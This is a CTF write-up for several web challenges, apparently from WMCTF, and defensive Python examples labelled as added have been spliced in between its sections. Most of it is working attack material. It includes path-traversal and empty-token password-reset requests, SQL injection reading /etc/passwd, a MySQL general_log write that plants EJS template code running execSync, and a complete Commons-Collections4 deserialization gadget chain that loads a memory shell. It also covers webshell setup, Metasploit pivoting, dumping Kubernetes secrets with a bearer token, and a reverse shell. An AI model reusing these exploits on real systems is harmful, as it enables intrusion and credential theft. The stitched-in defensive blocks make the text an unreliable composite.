It's been a long time since I last wrote a blog post. ORZ

AnyFileRead

There is a parsing-differential problem.

Reference: https://www.cuijianxiong.top/%E6%9C%AA%E5%88%86%E7%B1%BB/2019/05/20/e8b7afe5be84e5b7aee5bc82e58c96e58fafe883bde5bc95e58f91e4b880e4ba9be5ae89e585a8e997aee9a298e7bbad/

Bypass with /admin/../

GET /admin/../flag HTTP/1.1
Host: 43.132.224.5:8888
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

WMCTF{bypass_auth_is_so_Exciting}
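The differential above comes from an authorization guard that matches the raw request path while the file-serving layer resolves `..` first. The added example below (not from the original post) assumes the guarded resource is `/flag` and shows the raw-path guard letting `/admin/../flag` through while a guard that canonicalizes first does not:

```python
import posixpath
from urllib.parse import unquote, urlsplit

PROTECTED = "/flag"   # constructed: the resource the guard is meant to cover


def naive_requires_auth(raw_path: str) -> bool:
    # Guard that looks at the request path exactly as it arrived on the wire.
    return raw_path == PROTECTED


def canonical_path(raw_path: str) -> str:
    # Decode percent-encoding once, then resolve "." and ".." the way the
    # file-serving layer will. normpath keeps a leading "//", so squash it.
    path = unquote(urlsplit(raw_path).path)
    return "/" + posixpath.normpath("/" + path).lstrip("/")


def hardened_requires_auth(raw_path: str) -> bool:
    # Decide on the canonical path so the guard and the file server agree
    # on which resource is actually being requested.
    return canonical_path(raw_path) == PROTECTED


# Constructed request paths (not from the original post).
SAMPLES = ["/flag", "/admin/../flag", "/admin/%2e%2e/flag", "/admin/flag"]


def compare(samples=SAMPLES):
    # One row per sample: (raw path, canonical path, naive verdict, hardened verdict).
    return [(p, canonical_path(p), naive_requires_auth(p), hardened_requires_auth(p))
            for p in samples]
```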

ezblog

The goal is RCE.


/post/:id/edit is injectable, and the --secure-file-priv setting still allows file reads.

from requests import get
from urllib import parse
from re import search
proxies = {
    "http": None,
    "https": None
}

HOST = 'http://5bf11e7b-8550-4e62-a3f6-8b0f86c36a35.wmctf.wm-team.cn'

ROUTE = "/post/{}/edit".format(parse.quote('0 union select 666, 666, load_file(\'/etc/passwd\')').replace('/', '%2F'))

print(ROUTE)

r = get(HOST+ROUTE, proxies=proxies, allow_redirects=False)

print(r.status_code)

# print(r.content)

s = search(r'{.*}', r.text)

if s:
    print(s.group(0))

Read the PIN code from

/home/ezblog/.pm2/logs/main-out.log

With the PIN, write a file that meets the conditions under /home/ezblog/views/ and have the /api/debugger/template/test route render it. On trying this I found a permission problem, so restart the container and write directly into /home/ezblog/views/index.ejs instead.

# -*- encoding:utf-8 -*-

import requests

session = requests.session()

proxies = {
    "http": "http://127.0.0.1:8084",
    "https": "http://127.0.0.1:8084"
}
url = 'http://69e1df39-c6c8-4f77-8485-2a35297faefb.wmctf.wm-team.cn'
# url = 'http://localhost:3000'
authorization = "d0ae1a1c-e44e-448e-ba4c-f91cc903a317"


def execute_sql(sql):
    burp0_url = url + "/api/debugger/sql/execute"
    burp0_headers = {"Authorization": authorization}
    burp0_data = {"code": sql}
    r = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxies)
    print(r.json()["data"])


def main():
    execute_sql("show variables like \"%general_log%\";")
    execute_sql("create database mysql;")
    execute_sql("set global general_log_file = '/home/ezblog/views/index.ejs';")
    execute_sql("""CREATE TABLE mysql.general_log(
event_time TIMESTAMP(6) NOT NULL DEFAULT CURRENT_TIMESTAMP(6),
user_host mediumtext NOT NULL,
thread_id int(11) NOT NULL,
server_id int(10) unsigned NOT NULL,
command_type varchar(64) NOT NULL,
argument mediumtext NOT NULL
) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='General log';""")
    execute_sql("SET GLOBAL log_output = 'FILE,TABLE';")
    execute_sql("set global general_log =1;")
    execute_sql("""select "<%=global.process.mainModule.constructor._load('child_process').execSync('/readflag').toString();%>";""")
    execute_sql("set global general_log =0;")


if __name__ == '__main__':
    main()
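The write primitive above works because the application's database account may change global variables, so `general_log_file` can be pointed at a template the web process renders. The added example below (not from the original post) runs three detection rules over constructed statement lines of the kind a query-audit log records; the allowed log directories are assumptions:

```python
import re

# Constructed statement lines, in the shape a query-audit log records them
# (not log output from the original post).
SAMPLE_STATEMENTS = [
    "select * from posts where id = 3",
    'show variables like "%general_log%"',
    "set global general_log_file = '/home/ezblog/views/index.ejs'",
    "SET GLOBAL log_output = 'FILE,TABLE'",
    "set global general_log =1",
    'select "<%= 7 * 7 %>"',
    "set global general_log_file = '/var/lib/mysql/general.log'",
]

# Directories where MySQL is expected to write its own logs (constructed).
ALLOWED_LOG_DIRS = ("/var/lib/mysql/", "/var/log/mysql/")

LOG_FILE_RE = re.compile(r"set\s+global\s+general_log_file\s*=\s*'([^']*)'", re.I)
LOG_ON_RE = re.compile(r"set\s+global\s+general_log\s*=\s*(?:1|on)\b", re.I)
TEMPLATE_RE = re.compile(r"<%[=\-]?.*?%>", re.S)


def classify(stmt: str):
    # Returns an alert string for a suspicious statement, else None.
    m = LOG_FILE_RE.search(stmt)
    if m:
        target = m.group(1)
        if target.startswith(ALLOWED_LOG_DIRS):
            return None
        return "general_log_file redirected outside log dirs: " + target
    if LOG_ON_RE.search(stmt):
        return "general log switched on at runtime"
    if TEMPLATE_RE.search(stmt):
        return "template tag embedded in a SQL literal"
    return None


def find_alerts(statements):
    # (index, alert) for every statement that trips a rule.
    return [(i, a) for i, s in enumerate(statements) if (a := classify(s))]
```

The rules are a detection layer; the fix is to run the application under a database account without SUPER or SYSTEM_VARIABLES_ADMIN and to keep the template directory unwritable by the database process.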

ez_java_again

A comment reveals an endpoint:

/Imagefile?url1=upload/favicon.ico

Accessing it says the parameter must contain the string "java" and must not contain the string "flag".


Arbitrary file read is possible:

/Imagefile?url1=file:///etc/passwd%23java
/Imagefile?url1=file:///proc/1/cmdline%23java
/Imagefile?url1=file:///%23java

Any directory can be listed.


But the class files read this way could not be decompiled.

It turned out to be an unintended solution.

It is the file protocol, so the filter is bypassed with double URL encoding.
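The keyword filter above fails because "java" can sit in a URL fragment and the scheme can be hidden behind a second layer of encoding. The added example below (not from the original post) assumes the endpoint is only meant to serve files under an upload directory, and resolves the parameter as a local name instead of a URL:

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed: where uploads live on disk; the endpoint is assumed to serve
# only files under this directory.
UPLOAD_ROOT = "/srv/app/upload"


def naive_allows(url1: str) -> bool:
    # The keyword filter the challenge enforced, written out as a function.
    return "java" in url1 and "flag" not in url1


def hardened_resolve(url1: str):
    # Returns the absolute file path to serve, or None to refuse.
    decoded = unquote(url1)
    if "%" in decoded:
        return None            # second encoding layer: refuse, never loop-decode
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:
        return None            # file:, http:, jar: ... are not local upload names
    name = parts.path          # a fragment such as "#java" is dropped by the parser
    if not name.startswith("upload/"):
        return None
    full = posixpath.normpath(posixpath.join(UPLOAD_ROOT, name[len("upload/"):]))
    if not full.startswith(UPLOAD_ROOT + "/"):
        return None            # "../" escaped the directory, or the directory itself was asked for
    return full
```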


你的权限放着我来

An arbitrary-user password reset exists.

Setting the token to an empty value is enough.

POST /api/change HTTP/1.1
Host: 28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn
Content-Length: 72
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn
Referer: http://28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn/change
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

newPassword=123456&confirmPassword=123456&token=&email=alice@example.com


Resetting the password of jom@roomke.com gives the flag.


flag{test_flag}
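The reset accepts an empty token, so the check never actually binds the request to an issued token. The added example below (not from the original post; the challenge's server code was not shown, so the vulnerable variant is an illustration of one way this arises) contrasts that with a verifier that rejects empty tokens, enforces expiry and single use, and compares in constant time:

```python
import hmac
import secrets
import time

# Constructed in-memory store of pending resets: email -> (token, expiry epoch).
RESET_TOKENS = {}


def issue_reset_token(email: str, ttl_seconds: int = 900, now=None) -> str:
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[email] = (token, now + ttl_seconds)
    return token


def vulnerable_token_ok(email: str, token) -> bool:
    # Illustrative only: a lookup that falls back to an empty string makes a
    # missing token "match" every account that has no pending reset.
    stored = RESET_TOKENS.get(email, ("", 0))[0]
    return (token or "") == stored


def hardened_token_ok(email: str, token, now=None) -> bool:
    now = time.time() if now is None else now
    if not token:
        return False                      # absent or empty token never matches
    record = RESET_TOKENS.get(email)
    if record is None:
        return False                      # no reset was requested for this account
    stored, expiry = record
    if now > expiry:
        RESET_TOKENS.pop(email, None)     # expired: discard it
        return False
    if not hmac.compare_digest(stored.encode(), token.encode()):
        return False                      # constant-time comparison
    RESET_TOKENS.pop(email, None)         # single use: consume on success
    return True
```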

ez_challenge

There is a commons-collections4-4.0 dependency, so the CC4 chain can be used directly.

Generate the payload:

package com.example.exp;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

public class ExpFin {

    public static void main(String[] args) throws Exception {

        ClassPool pool = ClassPool.getDefault();
        // in-memory shell class, loaded through TemplatesImpl
        byte[] bytes = Repository.lookupClass(dawd.class).getBytes();
        Templates templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templatesImpl, "_name", "aaaa");
        setFieldValue(templatesImpl, "_tfactory", null);
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templatesImpl})
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesImpl});


        TransformingComparator transformingComparator = new TransformingComparator(instantiateTransformer);
        PriorityQueue priorityQueue = new PriorityQueue(2,transformingComparator);
        Field sizeField = PriorityQueue.class.getDeclaredField("size");
        sizeField.setAccessible(true);
        sizeField.set(priorityQueue,2);

        Field queueField = PriorityQueue.class.getDeclaredField("queue");
        queueField.setAccessible(true);
        queueField.set(priorityQueue,new Object[]{TrAXFilter.class,"bar"});

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(priorityQueue);
        objectOutputStream.close();
        String res = Base64.getEncoder().encodeToString(barr.toByteArray());
        System.out.println(res);
    }
    private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj, arg);
    }
}
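The payload above is a Java serialization stream whose class descriptors name the CC4 gadget classes. The added example below (not from the original post) is a boundary check that decodes a base64 payload, confirms the stream header, and rejects it when any of those class names appears in the modified-UTF8 form the stream uses; the sample stream it builds is a constructed stand-in, not a real object graph:

```python
import base64

STREAM_MAGIC = b"\xac\xed\x00\x05"          # Java serialization header

# Class names from the CC4 chain used in the post; none of them belongs in a
# stream this application accepts.
GADGET_CLASSES = (
    b"org.apache.commons.collections4.comparators.TransformingComparator",
    b"org.apache.commons.collections4.functors.InstantiateTransformer",
    b"org.apache.commons.collections4.functors.ChainedTransformer",
    b"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
)


def java_utf(s: bytes) -> bytes:
    # Class names are written as a 2-byte big-endian length followed by the bytes.
    return len(s).to_bytes(2, "big") + s


def build_sample_stream(class_names) -> str:
    # Constructed stand-in for a serialized graph: magic, then one
    # TC_OBJECT/TC_CLASSDESC/className triple per class, base64-encoded the way
    # the payload is shipped. Real streams carry field data as well; the
    # class-name encoding is what the scan keys on.
    out = bytearray(STREAM_MAGIC)
    for name in class_names:
        out += b"\x73\x72" + java_utf(name) + b"\x00" * 8  # + serialVersionUID
    return base64.b64encode(bytes(out)).decode()


def scan_serialized(b64: str):
    # Returns ("allow" | "reject" | "not-java-serialization", matched classes).
    data = base64.b64decode(b64)
    if not data.startswith(STREAM_MAGIC):
        return "not-java-serialization", []
    hits = [n.decode() for n in GADGET_CLASSES if java_utf(n) in data]
    return ("reject", hits) if hits else ("allow", [])
```

A denylist like this only catches the chains it knows; the durable fix in the Java application is an ObjectInputFilter allowlist (JEP 290) or not deserializing untrusted input at all.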

Script to write a Behinder (冰蝎) shell:

import requests

burp0_url = "http://119.45.178.147:30000/"
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://119.45.178.147:30000", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://119.45.178.147:30000/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"data": ""}
requests.post(burp0_url, headers=burp0_headers, data=burp0_data)

Password: Bfzwcmbggsdytqtff
Path: /*
Request header: User-Agent: Rechjn
Script type: JSP

Script to write a Godzilla (哥斯拉) shell:

import requests

burp0_url = "http://119.45.178.147:30000/"
burp0_cookies = {"JSESSIONID": "91540884E76F00EB1BF1A5AAD6B0B504"}
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://119.45.178.147:30000", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://119.45.178.147:30000/shellAacw125", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"data": ""}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

Encryptor: JAVA_AES_BASE64
Path: /shellAacw125
Password: Hcreljak
Key: Vazwoxyqvohfnbgcwq
Request header: Agent:aaa

After that comes internal network penetration.

Commands cannot be executed directly.

Use the Godzilla shell to upload an msf payload and make it executable.


Run it to get a session in msf.


Then, in the same way, set up an nps proxy and connect with Proxifier to reach the internal network.

The environment variables show there is a k3s service, plus a CHECK_SERVICE.


The challenge source contains an internal address.


Port forwarding with viper.


The token is obtained from lib.so inside the provided jar:

export KUBE="eyJhbGciOiJSUzI1NiIsImtpZCI6IlZvTVB3eDlfNm0wSzljbnhXRUNZU3JWa1VQRjY3Z05xaTRKU2xwUzBZNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImN0Zi1zZXJ2aWNlYWNjb3VudC1zZWNyZXQiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiY3RmLXNlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiYjEwNWQ5ODctZmQ1Zi00MjZiLTgxODgtOWI3MWNjZTkwYmRhIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6Y3RmLXNlcnZpY2VhY2NvdW50In0.DAaw3fHoGdY8Kl4BHnGeuQaAHJQpLdbB-jsatlLVfJM60N6Ftx0TyXlGDCsgm2e0u25xnWudQqZeneu1H1EaC0QQDzliPjG5dVhbXYIciM3dOyb8cap5wy5bPAgsAE1wPs_ZxAT6r7XQjWfYkqY6waI6R4_Hdrb98Vzwo4O6EYqNQAX8lVlGtAoIbkZ7U72z-zDR6rf_IHetdRs2JYpzG9kScbZLkWGHelY18dCXZHW_FfKqw1yh9zLUf8mh3PwXIeruUOp2oznVazT-qVnxaMOhLKF-4zqEXPbQVgoZh8mT6DNXj5GCBDex4_Uptj-dYJtMzSNC8qyenAeb3tg3Sg"
kubectl --token=$KUBE --server=https://xxx.xxx.xx.xxx:6443 --insecure-skip-tls-verify=true auth can-i --list -n default


kubectl --token=$KUBE --server=https://xxx.xxx.xx.xxx:6443 --insecure-skip-tls-verify=true get secrets -o yaml -n default

which gives:

apiVersion: v1
items:
- apiVersion: v1
  data:
    password: NWU5ZDgxODktNWMxNi00NTg3LTkyNjAtNGU2YjBjODZmMWVi
    username: a2V5
  kind: Secret
  metadata:
    annotations:
      kubectl.kubernetes.io/last-applied-configuration: |
        {"apiVersion":"v1","data":{"password":"NWU5ZDgxODktNWMxNi00NTg3LTkyNjAtNGU2YjBjODZmMWVi","username":"a2V5"},"kind":"Secret","metadata":{"annotations":{},"name":"key-secret","namespace":"default"},"type":"Opaque"}
    creationTimestamp: "2023-08-18T19:01:04Z"
    managedFields:
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:data:
          .: {}
          f:password: {}
          f:username: {}
        f:metadata:
          f:annotations:
            .: {}
            f:kubectl.kubernetes.io/last-applied-configuration: {}
        f:type: {}
      manager: kubectl-client-side-apply
      operation: Update
      time: "2023-08-18T19:01:04Z"
    name: key-secret
    namespace: default
    resourceVersion: "31990"
    uid: 41eca5bb-3afb-49cd-86ef-9b0e482929d2
  type: Opaque
- apiVersion: v1
  data:
    ca.crt: <omitted>
    namespace: ZGVmYXVsdA==
    token: <omitted>
  kind: Secret
  metadata:
    annotations:
      kubernetes.io/service-account.name: ctf-serviceaccount
      kubernetes.io/service-account.uid: b105d987-fd5f-426b-8188-9b71cce90bda
    creationTimestamp: "2023-08-18T13:22:29Z"
    labels:
      kubernetes.io/legacy-token-last-used: "2023-08-20"
    managedFields:
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:metadata:
          f:annotations:
            .: {}
            f:kubernetes.io/service-account.name: {}
        f:type: {}
      manager: kubectl-create
      operation: Update
      time: "2023-08-18T13:22:29Z"
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:data:
          .: {}
          f:ca.crt: {}
          f:namespace: {}
          f:token: {}
        f:metadata:
          f:annotations:
            f:kubernetes.io/service-account.uid: {}
          f:labels:
            .: {}
            f:kubernetes.io/legacy-token-last-used: {}
      manager: k3s
      operation: Update
      time: "2023-08-20T06:36:29Z"
    name: ctf-serviceaccount-secret
    namespace: default
    resourceVersion: "140777"
    uid: bf517b49-e11d-42da-879c-df84513ce55d
  type: kubernetes.io/service-account-token
kind: List
metadata:
  resourceVersion: ""
  selfLink: ""

Base64-decoding the password above gives the key 5e9d8189-5c16-4587-9260-4e6b0c86f1eb.

Access the internal check_service to execute commands.


Get a reverse shell and run /readflag.
